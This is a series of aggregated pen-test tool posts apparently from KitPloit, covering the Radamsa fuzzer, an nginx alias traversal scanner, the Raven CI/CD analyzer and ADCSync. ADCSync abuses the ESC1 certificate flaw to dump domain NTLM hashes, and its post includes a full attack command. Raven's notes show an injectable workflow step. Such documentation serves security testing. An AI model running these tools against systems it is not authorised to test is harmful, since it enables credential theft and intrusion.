    -h, --help show this help message and exit
    -i IOCTLCODE, --ioctlcode IOCTLCODE
    analyze specified IoControlCode (e.g. 22201c)
    -T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
    total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
    -t TIMEOUT, --timeout TIMEOUT
    timeout for analyze each IoControlCode (default 40, 0 to unlimited)
    -l LENGTH, --length LENGTH
    the limit of number of instructions for technique L engthLimiter (default 0, 0
    to unlimited)
    -b BOUND, --bound BOUND
    the bound for technique LoopSeer (default 0, 0 to unlimited)
    -g GLOBAL_VAR, --global_var GLOBAL_VAR
    symbolize how many bytes in .data section (default 0 hex)
    -a ADDRESS, --address ADDRESS
    address of ioctl handler to directly start hunting with blank state (e.g.
    140005c20)
    -e EXCLUDE, --exclude EXCLUDE
    exclude function address split with , (e.g. 140005c20,140006c20)
    -o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
    -r, --recursion do not kill state if detecting recursion (default False)
    -c, --complete get complete base state (default False)
    -d, --debug print debug info while analyzing (default False)

    Evaluation

    # python3 evaluation/statistics.py -h
    usage: statistics.py [-h] [-w] path

    positional arguments:
    path target dir or file path

    optional arguments:
    -h, --help show this help message and exit
    -w, --wdm copy the wdm drivers into <path>/wdm

    Test

    1. Compile the testing examples in test to generate testing driver files.
    2. Run IOCTLance against the drvier files.

    Reference



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Radamsa - A General-Purpose Fuzzer

    By: Zion3R β€” March 25th 2024 at 11:30


    Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and, easy to get up and running.


    Nutshell:

     $ # please please please fuzz your programs. here is one way to get data for it:
    $ sudo apt-get install gcc make git wget
    $ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
    $ echo "HAL 9000" | radamsa

    What the Fuzz

    Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers.

    Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen.

    There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.

    Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.

    Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.

    Requirements

    Supported operating systems: * GNU/Linux * OpenBSD * FreeBSD * Mac OS X * Windows (using Cygwin)

    Software requirements for building from sources: * gcc / clang * make * git * wget

    Building Radamsa

     $ git clone https://gitlab.com/akihe/radamsa.git
    $ cd radamsa
    $ make
    $ sudo make install # optional, you can also just grab bin/radamsa
    $ radamsa --help

    Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.

    Fuzzing with Radamsa

    This section assumes some familiarity with UNIX scripting.

    Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.

    Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.

    In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe.

     $ echo "aaa" | radamsa
    aaaa

    Here radamsa decided to add one 'a' to the input. Let's try that again.

     $ echo "aaa" | radamsa
    ːaaa

    Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.

     $ echo "Fuzztron 2000" | radamsa --seed 4
    Fuzztron 4294967296

    This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.

    You can generate more than one output by using the -n parameter as follows:

     $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
    1 + (2 + (2 + (3 + 4?)
    1 + (2 + (3 +?4))
    18446744073709551615 + 4)))
    1 + (2 + (3 + 170141183460469231731687303715884105727))

    There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.

    What we have so far can be used to for example test programs that read input from standard input, as in

     $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
    [...]
    (standard_in) 1418: illegal character: ^_
    (standard_in) 1422: syntax error
    (standard_in) 1424: syntax error
    (standard_in) 1424: memory exhausted
    [hang]

    Or the compiler used to compile Radamsa:

     $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
    [...]
    > What is 'Γ³ Β΅'?
    4901126677
    > $

    Or to test decompression:

     $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null

    Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:

     $ gzip -c /bin/bash > sample.gz
    $ while true; do radamsa sample.gz | gzip -d > /dev/null; done

    Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:

     $ gzip -c /bin/bash > sample.gz
    $ while true
    do
    radamsa sample.gz > fuzzed.gz
    gzip -dc fuzzed.gz > /dev/null
    test $? -gt 127 && break
    done

    This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.

    One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.

     $ echo "1 + 2" > sample-1
    $ echo "(124 % 7) ^ 1*2" > sample-2
    $ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
    $ bc sample-* < /dev/null
    3
    10
    5
    $ while true
    do
    radamsa -o fuzz-%n -n 100 sample-*
    bc fuzz-* < /dev/null
    test $? -gt 127 && break
    done

    This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.

    In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.

    Output Options

    The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:

    -o argument meaning example
    :port act as a TCP server in given port # radamsa -o :80 -n inf samples/*.http-resp
    ip:port connect as TCP client to port of ip $ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req
    - write to stdout $ radamsa -o - samples/*.vt100
    path write to files, %n is testcase # and %s the first suffix $ radamsa -o test-%n.%s -n 100 samples/*.foo

    Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.

    Related Tools

    A non-exhaustive list of free complementary tools:

    • GDB (http://www.gnu.org/software/gdb/)
    • Valgrind (http://valgrind.org/)
    • AddressSanitizer (http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer)
    • strace (http://sourceforge.net/projects/strace/)
    • tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/)

    A non-exhaustive list of related free tools: * American fuzzy lop (http://lcamtuf.coredump.cx/afl/) * Zzuf (http://caca.zoy.org/wiki/zzuf) * Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/) * Peach (http://peachfuzzer.com/) * Sulley (http://code.google.com/p/sulley/)

    Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable from via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.

    Some Known Results

    A robustness testing tool is obviously only good only if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.

    The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVE:s should be read as 'product X is now more robust (against Y)'.

    CVE program credit
    CVE-2007-3641 libarchive OUSPG
    CVE-2007-3644 libarchive OUSPG
    CVE-2007-3645 libarchive OUSPG
    CVE-2008-1372 bzip2 OUSPG
    CVE-2008-1387 ClamAV OUSPG
    CVE-2008-1412 F-Secure OUSPG
    CVE-2008-1837 ClamAV OUSPG
    CVE-2008-6536 7-zip OUSPG
    CVE-2008-6903 Sophos Anti-Virus OUSPG
    CVE-2010-0001 Gzip integer underflow in unlzw
    CVE-2010-0192 Acroread OUSPG
    CVE-2010-1205 libpng OUSPG
    CVE-2010-1410 Webkit OUSPG
    CVE-2010-1415 Webkit OUSPG
    CVE-2010-1793 Webkit OUSPG
    CVE-2010-2065 libtiff found by CERT-FI
    CVE-2010-2443 libtiff found by CERT-FI
    CVE-2010-2597 libtiff found by CERT-FI
    CVE-2010-2482 libtiff found by CERT-FI
    CVE-2011-0522 VLC found by Harry Sintonen
    CVE-2011-0181 Apple ImageIO found by Harry Sintonen
    CVE-2011-0198 Apple Type Services found by Harry Sintonen
    CVE-2011-0205 Apple ImageIO found by Harry Sintonen
    CVE-2011-0201 Apple CoreFoundation found by Harry Sintonen
    CVE-2011-1276 Excel found by Nicolas GrΓ©goire of Agarri
    CVE-2011-1186 Chrome OUSPG
    CVE-2011-1434 Chrome OUSPG
    CVE-2011-2348 Chrome OUSPG
    CVE-2011-2804 Chrome/pdf OUSPG
    CVE-2011-2830 Chrome/pdf OUSPG
    CVE-2011-2839 Chrome/pdf OUSPG
    CVE-2011-2861 Chrome/pdf OUSPG
    CVE-2011-3146 librsvg found by Sauli Pahlman
    CVE-2011-3654 Mozilla Firefox OUSPG
    CVE-2011-3892 Theora OUSPG
    CVE-2011-3893 Chrome OUSPG
    CVE-2011-3895 FFmpeg OUSPG
    CVE-2011-3957 Chrome OUSPG
    CVE-2011-3959 Chrome OUSPG
    CVE-2011-3960 Chrome OUSPG
    CVE-2011-3962 Chrome OUSPG
    CVE-2011-3966 Chrome OUSPG
    CVE-2011-3970 libxslt OUSPG
    CVE-2012-0449 Firefox found by Nicolas GrΓ©goire of Agarri
    CVE-2012-0469 Mozilla Firefox OUSPG
    CVE-2012-0470 Mozilla Firefox OUSPG
    CVE-2012-0457 Mozilla Firefox OUSPG
    CVE-2012-2825 libxslt found by Nicolas GrΓ©goire of Agarri
    CVE-2012-2849 Chrome/GIF OUSPG
    CVE-2012-3972 Mozilla Firefox found by Nicolas GrΓ©goire of Agarri
    CVE-2012-1525 Acrobat Reader found by Nicolas GrΓ©goire of Agarri
    CVE-2012-2871 libxslt found by Nicolas GrΓ©goire of Agarri
    CVE-2012-2870 libxslt found by Nicolas GrΓ©goire of Agarri
    CVE-2012-2870 libxslt found by Nicolas GrΓ©goire of Agarri
    CVE-2012-4922 tor found by the Tor project
    CVE-2012-5108 Chrome OUSPG via NodeFuzz
    CVE-2012-2887 Chrome OUSPG via NodeFuzz
    CVE-2012-5120 Chrome OUSPG via NodeFuzz
    CVE-2012-5121 Chrome OUSPG via NodeFuzz
    CVE-2012-5145 Chrome OUSPG via NodeFuzz
    CVE-2012-4186 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2012-4187 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2012-4188 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2012-4202 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2013-0744 Mozilla Firefox OUSPG via NodeFuzz
    CVE-2013-1691 Mozilla Firefox OUSPG
    CVE-2013-1708 Mozilla Firefox OUSPG
    CVE-2013-4082 Wireshark found by cons0ul
    CVE-2013-1732 Mozilla Firefox OUSPG
    CVE-2014-0526 Adobe Reader X/XI Pedro Ribeiro (pedrib@gmail.com)
    CVE-2014-3669 PHP
    CVE-2014-3668 PHP
    CVE-2014-8449 Adobe Reader X/XI Pedro Ribeiro (pedrib@gmail.com)
    CVE-2014-3707 cURL Symeon Paraschoudis
    CVE-2014-7933 Chrome OUSPG
    CVE-2015-0797 Mozilla Firefox OUSPG
    CVE-2015-0813 Mozilla Firefox OUSPG
    CVE-2015-1220 Chrome OUSPG
    CVE-2015-1224 Chrome OUSPG
    CVE-2015-2819 Sybase SQL vah_13 (ERPScan)
    CVE-2015-2820 SAP Afaria vah_13 (ERPScan)
    CVE-2015-7091 Apple QuickTime Pedro Ribeiro (pedrib@gmail.com)
    CVE-2015-8330 SAP PCo agent Mathieu GELI (ERPScan)
    CVE-2016-1928 SAP HANA hdbxsengine Mathieu Geli (ERPScan)
    CVE-2016-3979 SAP NetWeaver @ret5et (ERPScan)
    CVE-2016-3980 SAP NetWeaver @ret5et (ERPScan)
    CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
    CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
    CVE-2016-9562 SAP NetWeaver @vah_13 (ERPScan)
    CVE-2017-5371 SAP ASE OData @vah_13 (ERPScan)
    CVE-2017-9843 SAP NETWEAVER @vah_13 (ERPScan)
    CVE-2017-9845 SAP NETWEAVER @vah_13 (ERPScan)
    CVE-2018-0101 Cisco ASA WebVPN/AnyConnect @saidelike (NCC Group)

    We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.

    Thanks

    The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.

    • Darkkey
    • Branden Archer

    Troubleshooting

    Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.

    You can also drop by at #radamsa on Freenode if you have questions or feedback.

    Issues your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.

    Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.

    FAQ

    Q: If I find a bug with radamsa, do I have to mention the tool?
    A: No.

    Q: Will you make a graphical version of radamsa?

    A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.

    Q: I can't install! I don't have root access on the machine!
    A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.

    Q: Radamsa takes several GB of memory to compile!1
    A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.

    Q: Radamsa does not compile using the instructions in this page!
    A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email (aohelin@gmail.com) or IRC (#radamsa on freenode).

    Q: I used fuzzer X and found much more bugs from program Y than Radamsa did.
    A: Cool. Let me know about it (aohelin@gmail.com) and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.

    Q: Can I get support for using radamsa?
    A: You can send email to aohelin@gmail.com or check if some of us happen to be hanging around at #radamsa on freenode.

    Q: Can I use radamsa on Windows?
    A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.

    Q: How can I install radamsa?
    A: Grab a binary from downloads and run it, or $ make && sudo make install.

    Q: How can I uninstall radamsa?
    A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.

    Q: Why are many outputs generated by Radamsa equal?
    A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.

    Q: There are lots of command line options. Which should I use for best results?
    A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.

    Q: How can I make radamsa faster?
    A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.

    Q: What's with the funny name?
    A: It's from a scene in a Finnish children's story. You've probably never heard about it.

    Q: Is this the last question?
    A: Yes.

    Warnings

    Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before they are being tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.

    Not safe when used as prescribed.

    This product may contain faint traces of parenthesis.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

    By: Zion3R β€” February 5th 2024 at 11:30


    navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


    Techniques

    Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:

    Heuristics

    navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.

    Brute-force

    navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.

    Installation

    git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
    go build

    Acknowledgements



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Raven - CI/CD Security Analyzer

    By: Zion3R β€” January 28th 2024 at 11:30


    RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

    With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

    We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


    What is Raven

    The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

    • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
    • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
    • Query Library: We created a library of pre-defined queries based on research conducted by the community.
    • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

    Possible usages for Raven:

    • Scanner for your own organization's security
    • Scanning specified organizations for bug bounty purposes
    • Scan everything and report issues found to save the internet
    • Research and learning purposes

    This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

    Why Raven

    In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

    • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
    • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
    • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
    • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
    • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

    Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

    It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

    Setup && Run

    To get started with Raven, follow these installation instructions:

    Step 1: Install the Raven package

    pip3 install raven-cycode

    Step 2: Setup a local Redis server and Neo4j database

    docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
    docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

    Another way to setup the environment is by running our provided docker compose file:

    git clone https://github.com/CycodeLabs/raven.git
    cd raven
    make setup

    Step 3: Run Raven Downloader

    Org mode:

    raven download org --token $GITHUB_TOKEN --org-name RavenDemo

    Crawl mode:

    raven download crawl --token $GITHUB_TOKEN --min-stars 1000

    Step 4: Run Raven Indexer

    raven index

    Step 5: Inspect the results through the reporter

    raven report --format raw

    At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

    Prerequisites

    • Python 3.9+
    • Docker Compose v2.1.0+
    • Docker Engine v1.13.0+

    Infrastructure

    Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

    Usage

    The tool contains three main functionalities, download and index and report.

    Download

    Download Organization Repositories

    usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --org-name ORG_NAME Organization name to download the workflows

    Download Public Repositories

    usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --max-stars MAX_STARS
    Maximum number of stars for a repository
    --min-stars MIN_STARS
    Minimum number of stars for a repository, default : 1000

    Index

    usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
    [--clean-neo4j] [--debug]

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
    --debug Whether to print debug statements, default: False

    Report

    usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
    [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
    [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
    [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
    {slack} ...

    positional arguments:
    {slack}
    slack Send report to slack channel

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
    Filter queries with specific tag
    --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
    Filter queries by severity level (default: info)
    --queries-path QUERIES_PATH, -dp QUERIES_PATH
    Queries folder (default: library)
    --format {raw,json}, -f {raw,json}
    Report format (default: raw)

    Examples

    Retrieve all workflows and actions associated with the organization.

    raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

    Scrape all publicly accessible GitHub repositories.

    raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

    After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

    raven index --debug

    Now, we can generate a report using our query library.

    raven report --severity high --tag injection --tag unauthenticated

    Rate Limiting

    For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

    • Code search - 30 queries per minute
    • Any other API - 5000 per hour

    Research Knowledge Base

    Current Limitations

    • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
    • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
    • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
    • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

    Future Research Work

    • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
    • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
    • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

    Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

    If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

    If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

    By: Zion3R β€” January 19th 2024 at 11:30


    This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


    This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

    python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___ ____ ___________
    / | / __ \/ ____/ ___/__ ______ _____
    / /| | / / / / / \__ \/ / / / __ \/ ___/
    / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
    /_/ |_/_____/\____//____/\__, /_/ /_/\___/
    /____/

    Grabbing user certs:
